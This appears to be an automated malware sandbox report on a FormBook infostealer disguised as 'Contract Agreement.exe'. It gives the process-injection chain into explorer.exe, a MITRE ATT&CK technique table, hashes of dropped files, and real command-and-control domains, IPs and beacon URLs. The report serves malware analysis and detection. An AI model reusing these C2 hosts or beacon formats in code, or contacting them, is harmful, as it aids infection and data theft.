Source: explorer.exe, 00000003.00000000.653398591.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000002.907549316.0000000001080000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.665606010.0000000005E50000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.907549316.0000000001080000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.907549316.0000000001080000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.669566755.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery141 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection612 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud | 
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | 
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing11 | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | 

Behavior Graph

Behavior Graph ID: 385426
Sample: Contract Agreement.exe
Startdate: 12/04/2021
Architecture: WINDOWS
Score: 100

Signatures attached to the start node:
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Found malware configuration
• Malicious sample detected (through community Yara rule)
• 7 other signatures

Process tree (node relationships recovered from the graph):
• Contract Agreement.exe 18 (started)
  • Dropped file: C:\Users\user\AppData\Local\...\1hqxmv.dll, PE32
  • Signature: Maps a DLL or memory area into another process
  • Contract Agreement.exe (started)
    • Signature: Modifies the context of a thread in another process (thread injection)
    • Signature: Maps a DLL or memory area into another process
    • Signature: Sample uses process hollowing technique
    • Signature: Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      • DNS/IP: bizcert360.com 72.52.251.1, 49756, 80 LIQUIDWEBUS United States
      • DNS/IP: www.sapanyc.com 142.111.179.147, 49750, 80 EGIHOSTINGUS United States
      • DNS/IP: 3 other IPs or domains
      • Signature: System process connects to network (likely due to code injection or exploit)
      • cmstp.exe (started)
        • Signature: Modifies the context of a thread in another process (thread injection)
        • Signature: Maps a DLL or memory area into another process
        • Signature: Tries to detect virtualization through RDTSC time measurements
        • cmd.exe 1 (started)
          • conhost.exe (started)

Screenshots

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Contract Agreement.exe | 21% | ReversingLabs | Win32.Trojan.SpyNoon

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsg2E21.tmp\1hqxmv.dll | 4% | ReversingLabs | 

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.Contract Agreement.exe.1eda0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.Contract Agreement.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.cmstp.exe.4bff834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
4.2.cmstp.exe.5bbc70.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.Contract Agreement.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.sapanyc.com/klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
www.middlehambooks.com/klf/ | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.bizcert360.com/klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bizcert360.com | 72.52.251.1 | true | true |  | unknown
www.sapanyc.com | 142.111.179.147 | true | true |  | unknown
www.protocolmodern.com | unknown | unknown | true |  | unknown
www.nyariorganics.com | unknown | unknown | true |  | unknown
www.bizcert360.com | unknown | unknown | true |  | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.sapanyc.com/klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA | true | Avira URL Cloud: safe | unknown
www.middlehambooks.com/klf/ | true | Avira URL Cloud: safe | low
http://www.bizcert360.com/klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.tiro.com | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.%s.comPA | explorer.exe, 00000003.00000002.908299208.0000000002B50000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false |  | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | false | 3x URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.111.179.147 | www.sapanyc.com | United States | 18779 | EGIHOSTINGUS | true
72.52.251.1 | bizcert360.com | United States | 32244 | LIQUIDWEBUS | true

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:385426
                                        Start date:12.04.2021
                                        Start time:13:50:14
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 37s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Contract Agreement.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/3@4/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 23.3% (good quality ratio 21%)
                                        • Quality average: 73.1%
                                        • Quality standard deviation: 31.2%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.3.254, 168.61.161.212, 13.107.246.254, 52.255.188.83, 40.88.32.150, 13.64.90.137, 13.88.21.125, 20.50.102.62, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385426/sample/Contract Agreement.exe

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                          Match           | Associated Sample Name / URL                             | Detection | Context
                                          142.111.179.147 | Drawings2.exe                                            | malicious |
                                          72.52.251.1     | http://gama-grow.bid/Need-to-send-the-attachment/        | malicious | raffiaempire.com/Vyqcaw/

                                          Domains

                                          Match           | Associated Sample Name / URL | Detection | Context
                                          www.sapanyc.com | Drawings2.exe                | malicious | 142.111.179.147

                                          ASN

                                          Match        | Associated Sample Name / URL                                                       | Detection | Context
                                          LIQUIDWEBUS  | vbc.exe                                                                            | malicious | 67.225.129.56
                                          LIQUIDWEBUS  | RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exe      | malicious | 173.199.133.192
                                          LIQUIDWEBUS  | Formbook.exe                                                                       | malicious | 67.225.138.69
                                          LIQUIDWEBUS  | 3yhInKB1T7.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | mjXMOZg9Hx.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | Eyej9j4lMJ.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | 37Hn9kZ0tg.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | RzHfC7fIWU.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | SELyJGbTey.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | oeve2OjHY2.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | j1zGasR46N.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | QHM2AdS9Ik.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | oSGsMCawfC.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | fr3o86AGId.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | zmIT0LdaEl.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | KeP1U6sRJ0.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | mRa0raLv0K.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | sHiqqe9Szk.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | Q6bIUSu1EB.exe                                                                     | malicious | 72.52.178.23
                                          LIQUIDWEBUS  | HfLT9YNvlQ.exe                                                                     | malicious | 72.52.178.23
                                          EGIHOSTINGUS | s6G3ZtvHZg.exe                                                                     | malicious | 142.111.76.118
                                          EGIHOSTINGUS | g2qwgG2xbe.exe                                                                     | malicious | 142.111.47.2
                                          EGIHOSTINGUS | winlog.exe                                                                         | malicious | 104.252.75.179
                                          EGIHOSTINGUS | 1ucvVfbHnD.exe                                                                     | malicious | 142.111.47.2
                                          EGIHOSTINGUS | PO#560.zip.exe                                                                     | malicious | 50.118.194.26
                                          EGIHOSTINGUS | PO4308.exe                                                                         | malicious | 104.164.33.210
                                          EGIHOSTINGUS | PO7321.exe                                                                         | malicious | 104.164.33.210
                                          EGIHOSTINGUS | SAKKAB QUOTATION_REQUEST.exe                                                       | malicious | 107.164.194.71
                                          EGIHOSTINGUS | RFQ-V-SAM-0321D056-DOC.exe                                                         | malicious | 104.252.75.179
                                          EGIHOSTINGUS | RFQ-415532-Refractory Materials for KNPC PROJECT_Tender in Kuwait...xlsx.exe      | malicious | 107.165.116.66
                                          EGIHOSTINGUS | Request an Estimate_2021_04_01.exe                                                 | malicious | 107.186.223.220
                                          EGIHOSTINGUS | PO PL.exe                                                                          | malicious | 107.186.125.46
                                          EGIHOSTINGUS | PO#7689.zip.exe                                                                    | malicious | 50.118.194.26
                                          EGIHOSTINGUS | 2021-04-01.exe                                                                     | malicious | 107.186.80.12
                                          EGIHOSTINGUS | PI.exe                                                                             | malicious | 104.252.75.130
                                          EGIHOSTINGUS | Inquiry.docx                                                                       | malicious | 50.118.194.27
                                          EGIHOSTINGUS | BL Draft copy.exe                                                                  | malicious | 107.186.80.9
                                          EGIHOSTINGUS | g0g865fQ2S.exe                                                                     | malicious | 142.111.47.2
                                          EGIHOSTINGUS | FTT103634332.exe                                                                   | malicious | 50.117.53.247
                                          EGIHOSTINGUS | PaymentInvoice.exe                                                                 | malicious | 107.186.80.174

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsg2E21.tmp\1hqxmv.dll
                                          Process:C:\Users\user\Desktop\Contract Agreement.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5632
                                          Entropy (8bit):4.077319736133544
                                          Encrypted:false
                                          SSDEEP:48:a97yzI322w3MWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqS+:1zIHw3T4IGN4/GCBKxfQKuix7
                                          MD5:7136D4F48A008EC08F3DE8BB41065DF0
                                          SHA1:0BF2944FB2CEA04138870901113FB6179B66D958
                                          SHA-256:24321D89754E1178D429E12E2D36AE449B029DF0AE4926D08F6119371CBB0B31
                                          SHA-512:11E770FA3690E37780B7C1BAFCFE57181B9F115F42616CC841C9FD2117294DAE6B9E8E916110DB6E19A613FA4DC10372B7E5AFCE8C967B1912DE6048D434803B
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L....ys`...........!......................... ...............................`............@.........................P ..P....1.......@.......................P......0 ...............................................0...............................code............................... ....data...|.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\shkkjqaazzgu5ta0vz0z
                                          Process:C:\Users\user\Desktop\Contract Agreement.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.998906533936236
                                          Encrypted:true
                                          SSDEEP:3072:QbcqOmirtMUEOdvFo1FUhU94i19VXuFAzpd067/AtG0s5fPkmATTvfrn/ynWlpWi:QbcqOmuNjVODr4i19VXuO06LAtSXpIT9
                                          MD5:17216972B337142D42789E2AB0FAC4A1
                                          SHA1:AFD4498616554CEFE685F8540F6F673E28C44899
                                          SHA-256:986A68A9C59786112F323E8ED96386EEA52B40570EAF9DC0CEB92FBAD39059D3
                                          SHA-512:136D71730084075360298F20B3263E753743C8759DB197AB7F0D9DB570AF2DF9126198CF8D461AB4DA20415F3C1FA5D5603C8D4901468794AA9910D1E725A583
                                          Malicious:false
                                          Reputation:low
                                          Preview: ...'~...>...2.....j.=.sT.,..R...R.T...,.l..n ...x.)..T.X........?.<CKz#..,...V..G.....]..u.'....V..#...JO>-......(:.z.....c..,..o....._...f.....vVQ.S......-...!.....$...[....B.-...O.......:...7.e7.[.).%.Q2...dl..u...>.5#...I.....O......pq......I..7,\<M.B|...u'2....R>."...mX.....`...R.......[..q.R...7.{F..^..`9.F{|z.?.6...$.....:......_....}9.....=>/.o.............(...4.,'}..w..o...%.F...$.Fn^z..t...cp...pVY..7#V....a...z+..~.!.nY.^....u..k..8&...U......$.".qq.....w..\V....nJ...e.......mmo2w..j...o.U$........&%....&I.....e..V.,)N.v..3D..q0.5.......W.<...J.06.z6.."..c....*c..7..H.......h.;.[.).r.+"....:s.Ur3...R........L.A~..".p..A...M.0;...s.o..O..H4r..(.....*U.....u...`e.D..8....4w3....n.y.V.....Q;l].z.V.,...-.0........wI.-S-z.yH..k..Gf.76.iA$.......BNs6..X ..L..WYs.Y.$@.$..\A..@.Y...z..h..7...I._".1..:.._I%..7.W......Y.,.Zi'!.m... GlA.$.....CqO.I...>..C@..C......?.Q....2N...hi.xh.,-.B4.sC.MW`..7.:.....d.q.6Z...U....s._...+Z......l.@#..T...I...
                                          C:\Users\user\AppData\Local\Temp\t86ufazvin9p7ygm
                                          Process:C:\Users\user\Desktop\Contract Agreement.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.961735036957541
                                          Encrypted:false
                                          SSDEEP:192:rC4kxgfjm6H8jw4L79RFiLowKKdk1tHQOnvI3g:reSH8jn7FiLorek1BRIQ
                                          MD5:CA7A2887FB88245E29FB37E1498D2B58
                                          SHA1:6D5E7B19A938CF0B59EECEFA0F0C844407C3330F
                                          SHA-256:808BA0EF85D8C8960D2F9071E5B61B514A5F3420CE51C9C294BE59A51F9268F1
                                          SHA-512:A0286AF925877CA1D77481C6DAEA1098E18F1187E60A83DDB0A83EFC5A235527EBD9C09653A665D76C6564C028B64C3A4C15F6F9F23C2C9560C0A9BCDB858BBF
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..5Z.w.v.~.e.d....s............../......0..4K!..z.d.TIm.b.}T]....YFCfO.-..e+ ]0......%R?r.|.y6.....F..@.....X.E......jF..d....+.R.^..lK.....tqN.....kZVCH''...LP]ZqZ.X..."?.3'.z..8.....N.w,#....h..~.....Z.Ch....zw.1.k`}.]6s?..Er.[~h.9?ZGL....{I....T...Y....y6d..#.).....7|R.H..J.M.K..... ..0.;.!..+...s8....b8......s....63Vo...*t......t....".,.)f.....N;k......f.D6......@)..=....y..../.jg\;...y.$!>E.....$.38...~.....!.B.K.v......h%{...e`rM.............-(o`}....sHE...u~[...s@.<..@... .V..."7.o...-.V...[q........k."6....E...Cg.....5^...-.wt.]lYF9..2.t;"G{.^C...iz..$...xd.3.r............S..t.. ..I...IE...%......dG* .Hs...Ol.P.......x.f!...1,...m.i%"?va......=.sw)..Q..fC"...|...H...d.hCh.....$.......5.j<.q.X....D.<...<-nN%}(n.a...6r.....H./.7V......'.P..<.....$2T..$K.|....yx..T.#.[.gl'.\q.....+.#^W....r.]$+..&..Z9.<...>DKZ.........................|...i.....6w.K.>Bfk|`BGHugsq%..\!ZW....8l.?......R.2......'!..;8....y.E..r.Y.....y.}...

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.918030370335679
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
